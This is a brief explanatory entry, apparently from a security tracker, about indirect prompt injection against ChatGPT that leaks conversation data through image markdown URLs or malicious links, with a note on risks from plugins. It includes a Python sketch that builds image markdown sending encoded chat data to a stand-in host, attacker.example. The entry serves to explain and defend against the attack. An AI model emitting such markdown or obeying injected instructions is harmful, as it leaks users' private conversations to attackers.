Advanced Data Exfiltration Techniques with ChatGPT
Summary
An indirect prompt injection attack (tricking an AI into following hidden instructions embedded in its input) can allow an attacker to steal data from a ChatGPT user's conversation. Exfiltration happens either through image markdown injection, where the AI is instructed to embed conversation data into the URL of an image it renders, or by convincing the user to click a malicious link. ChatGPT Plugins, add-ons that extend ChatGPT's functionality, create additional exfiltration risk because they receive minimal security review before deployment.
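To make the image markdown injection concrete, here is a minimal sketch of the payload an injected prompt would ask the model to emit. The endpoint `attacker.example` and the function name are hypothetical illustrations, not details from the source; the point is that rendering the markdown makes the chat client issue a GET request carrying conversation data in the query string.

```python
from urllib.parse import quote

# Hypothetical attacker-controlled endpoint (illustration only).
ATTACKER_HOST = "https://attacker.example/log"

def build_exfil_markdown(secret: str) -> str:
    """Build the image markdown an injected prompt would have the model output.

    When the chat UI renders this markdown, it fetches the image URL,
    which silently sends `secret` to the attacker's server as a URL parameter.
    """
    return f"![loading]({ATTACKER_HOST}?q={quote(secret)})"

# Example: conversation data the hidden instructions tell the model to leak.
payload = build_exfil_markdown("user asked about salary negotiation")
print(payload)
```

The user sees at most a broken or tiny image, while the data has already left in the image request; this is why the original post treats automatic markdown image rendering as an exfiltration channel.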
Original source: https://embracethered.com/blog/posts/2023/advanced-plugin-data-exfiltration-trickery/
First tracked: February 12, 2026 at 02:20 PM
Classified by LLM (prompt v3) · confidence: 85%